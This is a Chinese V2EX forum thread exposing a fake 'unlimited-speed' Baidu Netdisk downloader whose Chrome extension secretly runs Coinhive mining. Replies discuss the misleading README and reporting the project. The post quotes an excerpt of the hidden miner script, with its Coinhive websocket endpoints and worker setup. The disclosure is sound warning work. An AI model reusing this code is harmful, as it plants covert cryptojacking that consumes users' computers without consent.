分享一个以「提高算力」为名在你电脑上挖矿的「百度网盘不限速下载器」

2018-03-02 19:43:30 +08:00
 ynyounuo

最近有朋友告诉我自己电脑时常连接 coinhive 不知道为什么,一排查发现是这哥们安装了所谓「百度不限速下载器」

这是一款通过算法来提速的高速下载器,支持 Windows 和 Mac。 请在官方地址下载,本程序不会获取您的任何隐私,绝对无毒,请放心使用。 本软件将持续更新,目标是打造一个最好用的高速下载器。

插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力

实际上这东西就是用 Chrome 拓展执行 coinhive 挖矿,然后本地程序大概是打包了一个 aria2 和大概类似 BaiduExporter 的 Electron 程序。

拓展后台运行:

     var q = navigator.hardwareConcurrency || 4;
        H = d.threads || q,
            function() {
                return void 0 !== window.WebAssembly
            }() && d.forceASMJS, S = Z, v = b;
        var $ = "ifExclusiveTab",
            ll = "forceMultiTab",
            dl = "forceExclusiveTab",
            Zl = function(l) {
                return (window.URL || window.webkitURL || window.mozURL).createObjectURL(new Blob([l]))
            }(m.default),
            bl = {
                LIB_URL: "https://coinhive.com/lib/",
                ASMJS_NAME: "worker-asmjs.min.js",
                REQUIRES_AUTH: !1,
                WEBSOCKET_SHARDS: [
                    ["wss://ws001.coinhive.com/proxy", "wss://ws002.coinhive.com/proxy", "wss://ws003.coinhive.com/proxy", "wss://ws004.coinhive.com/proxy", "wss://ws005.coinhive.com/proxy", "wss://ws006.coinhive.com/proxy", "wss://ws007.coinhive.com/proxy", "wss://ws029.coinhive.com/proxy"],
                    ["wss://ws008.coinhive.com/proxy", "wss://ws009.coinhive.com/proxy", "wss://ws010.coinhive.com/proxy", "wss://ws011.coinhive.com/proxy", "wss://ws012.coinhive.com/proxy", "wss://ws013.coinhive.com/proxy", "wss://ws014.coinhive.com/proxy", "wss://ws030.coinhive.com/proxy"],
                    ["wss://ws015.coinhive.com/proxy", "wss://ws016.coinhive.com/proxy", "wss://ws017.coinhive.com/proxy", "wss://ws018.coinhive.com/proxy", "wss://ws019.coinhive.com/proxy", "wss://ws020.coinhive.com/proxy", "wss://ws021.coinhive.com/proxy", "wss://ws031.coinhive.com/proxy"],
                    ["wss://ws022.coinhive.com/proxy", "wss://ws023.coinhive.com/proxy", "wss://ws024.coinhive.com/proxy", "wss://ws025.coinhive.com/proxy", "wss://ws026.coinhive.com/proxy", "wss://ws027.coinhive.com/proxy", "wss://ws028.coinhive.com/proxy", "wss://ws032.coinhive.com/proxy"]
                ],
                CAPTCHA_URL: "https://coinhive.com/captcha/",
                MINER_URL: "https://coinhive.com/media/miner.html",
                AUTH_URL: "https://authedmine.com/authenticate.html"
            },
            Vl = function() {
                this.worker = new Worker(Zl), this.worker.onmessage = this.onReady.bind(this), this.currentJob = null, this.verifyJob = null, this.jobCallback = function() {}, this.verifyCallback = function() {}, this._isReady = !1, this.hashesPerSecond = 0, this.hashesTotal = 0, this.running = !1, this.lastMessageTimestamp = Date.now()
            }

完整: https://gist.github.com/anonymous/1774ff85f84d07fdbeaefef44a236d34

本地程序结构:

├── dist-assets
│   ├── aria2.conf
│   ├── aria2.session
│   ├── aria2c
│   └── aria2c.exe
├── init.js
├── lib
│   ├── main.js
│   └── page
│       ├── index.css
│       ├── index.html
│       └── index.js
└── package.json

https://www.jianshu.com/p/075692b9feab

https://github.com/high-speed-downloader/high-speed-downloader

就这玩意儿有 800 多个 Star,其中一个现已匿名的维护者有将近 700 个 follower。

匿名的维护者八成之前还是个 vim 圈稍有点名气的人,因为被「依云」啊,「 mattn 」啊等人关注 。而且八成也可能逛 V 站,follower 里有看到不少 V 友

中枪的朋友赶紧清理了吧 - -

后台占用小量 CPU 挖矿并不可耻,明说就好,愿意的人自然会愿意。 但是藏着代码骗不懂的人真的挺可耻的。

8881 次点击
所在节点    分享发现
29 条回复
lScarlet
2018-03-02 19:49:55 +08:00
马克😏
zcbenz
2018-03-02 20:00:31 +08:00
建议把这个项目向 GitHub 官方举报,这种恶意代码已经涉嫌违反用户协议了。
ynyounuo
2018-03-02 20:01:42 +08:00
@zcbenz 举报过了,不过作者是把代码藏起来的,GitHub 只是以「开源」为幌子的发布站。
feverzsj
2018-03-02 20:03:05 +08:00
这些人做的勾当就像小电影开场的澳门博彩一样
miyuki
2018-03-02 20:03:30 +08:00
插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力


我觉得还是说明白点比较好
prolic
2018-03-02 20:10:09 +08:00
提高(我的分布式矿机)算力
chroming
2018-03-02 20:26:30 +08:00
竟然置顶了
ynyounuo
2018-03-02 20:53:15 +08:00
@chroming 200 铜币
madNeal
2018-03-02 21:26:18 +08:00
那个外卖红包的也有挖矿的吧
discrete
2018-03-02 21:56:39 +08:00
项目 README 不是写明了吗,最后一段。
XiaolinLeo
2018-03-02 22:03:13 +08:00
插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力,用户可以自行对比打开插件和关闭插件后 CPU 占用率以及其他各项性能的差别,折合成经济成本,每人每天不到 1 分钱,一个月不到 3 角钱,收益将用于项目维持,不会对个人电脑造成任何的损害,不用时关闭插件即可。特别再次申明,在该项目创立之初,作者几经权衡之后,出于互利共赢的考虑,还是在软件付费、商业广告和占用一点空闲的 CPU 之间选择了后者,如果对此特别介意的用户,请绕行。
ynyounuo
2018-03-02 22:08:34 +08:00
@discrete 这也算明说。那我植入木马不如说「用于提高眼界」
miyuki
2018-03-02 22:23:52 +08:00
@discrete 这个 README 也就能糊弄糊弄不懂的了
nolan1864
2018-03-02 22:28:06 +08:00
@discrete
@XiaolinLeo
开头:这是一款通过算法来提速的高速下载器,支持 Windows 和 Mac。
结尾:插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力

这个 5%他意思是说为了提高下载速度吧,没说是给他挖矿吧,这么明显的误导文字有什么好洗的。
cszhiyue
2018-03-02 22:43:12 +08:00
这种实际上并没有开源的。还求 star 是一种什么心理?
noahziheng
2018-03-02 23:42:30 +08:00
表示十分可怕,貌似楼主提到的匿名作者并不是匿名,貌似是 GitHub 系统的非法 E-mail 帐户...
因为那个帐户的活动记录一直到 1969 年...那时候 Github 显然还不存在...而 UNIX 时间戳向前最早就是到 1970 年,正好...这玩意显然只能从系统层面配置成这样,大概就是注册时间为 0 吧...
至于那些 Follower...大概是发现这个账户之后跟着玩的...
ynyounuo
2018-03-03 00:10:25 +08:00
@noahziheng
原来是官方账号,我还说呢。
那大概就是作者的 git config 有问题(没有用新账号的信息 commit )或者故意搞成这样。
zuolan
2018-03-03 07:45:44 +08:00
@noahziheng 这种匿名账号是怎么存在的?
noahziheng
2018-03-03 11:05:25 +08:00
@zuolan 看起来像是官方预置进去的或者是 web 端实现的时候的如果信息不正确就显示的默认值
noahziheng
2018-03-03 11:06:33 +08:00
@ynyounuo 故意的可能性比较大,想用这种方式匿名,后来才注册了那个项目名的账号

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/434369

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX